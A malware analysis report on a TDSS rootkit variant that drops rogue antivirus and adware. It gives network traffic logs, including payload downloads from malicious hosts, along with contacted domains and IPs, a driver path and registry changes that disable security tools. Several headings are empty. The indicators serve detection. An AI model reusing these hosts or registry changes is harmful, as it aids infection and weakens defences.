New TDSS variants install plenty of software
We have analyzed a recent TDSS sample and we have noticed that during the infection, it has installed plenty of software and backdoors in the infected system. Other than installing rogue security software, this time named Antivirus Scan, it has installed also other software like FLVTube Player, Sweetim Pack, Vista Cookies Collector, OfferBox, DataMngr, SweetIE, SweetIM, Fun4IM. That TDSS installs FLVTube Player is nothing new, but it is the first time we have noticed it has installed also all the other Instant Messenger related software.
One of the first software that was installed by the TDSS is named Antivirus Scan and it is another rogue security software that alerts the user with false security alerts and false detected files.
Network traffic:
GET /percer.php?login=ODQuMA== HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: afantispy .com GET /check?pgid=8 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: afantispy .com |
FLVTube Player is downloaded from:
GET /FLV/FLVTubePlayerSetup.exe HTTP/1.1 Host: download.feelviatubbo .biz |
This POST query:
POST / HTTP/1.0 Host: gbsup .com |
Generated a MySQL connection error in:
C:\Documents and Settings\kjjdhhht\My Documents\Programs\apache\htdocs\cyserv\includes\functions.php |
Fake security alerts:
Rootkit activity:
Kernel driver is located at:
C:\WINDOWS\system32\drivers\zeljqasas.sys |
Rootkit detections:
a-squared 19/12/2010 5.0.0.20 Gen.Variant.Taterf!IK
Avira AntiVir 19/12/2010 7.6.0.59 TR/Crypt.ZPACK.Gen
BitDefender 19/12/2010 7.0.0.2555 Gen:Variant.Taterf.21
Ikarus T3 19/12/2010 1001084 Gen.Variant.Taterf
AppInit_DLLs:
Files in Temp Folder:
OfferBox installed files:
Fun4IM installed files:
Searchqu MediaBar installed files:
Drvmsdll46 folder content:
Regedit is disabled:
Ring3 Hooks:
Hosts file is hijacked:
HKCU Run:
HKLM Run:
Running processes:
From this last image of running processes we can see that the process of Internet Explorer IEXPLORE.EXE is running and it has been executed by one of the active malware to open various porn related webpages, in particular:
There is also a non stable executable that keeps running:
System hijacks:
Value: DisableRegistryTools Data: 1 Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System Value: DisableSR Data: 1 Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore Value: LowRiskFileTypes Data: .exe Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations Value: ShowSuperHidden Data: 0 Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Value: FirstRunDisabled Data: 1 Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center Value: Enabled Data: 0 Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter Value: CheckExeSignatures Data: no Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Value: RunInvalidSignatures Data: 1 Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download |
Browser Helper Objects:
Value: juaw98rajewifhausihuggdd
Data: C:\WINDOWS\system32\fha6whi4fx.dll
CLSID: {B1B220C1-A503-59BD-F413-02B53A2C8954}
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler |
TCP connections during analysis:
afantispy .com – 93.158.114.164
sy2.perfectexe .com – 222.170.127.203
config.perfectexe .com – 122.224.6.48
perfectexe.com – -
026ac50bb7a03a66 .net – 109.196.143.72
gbsup .com – 204.45.118.202
justnewleft .ru – 91.217.162.97
flvtube .net – 174.137.179.7
vmnatf .com – 95.211.108.162
loudmo.go2jump .org – 69.89.87.59
download.feelviatubbo .biz – 74.206.252.108
feelviatubbo .biz – 174.137.179.7
Strange network traffic:
POST /+10740.html HTTP/1.1 CB2: 1 User-Agent: Mozilla Host: 92.115.96.123 HTTP/1.0 200 OK YES |
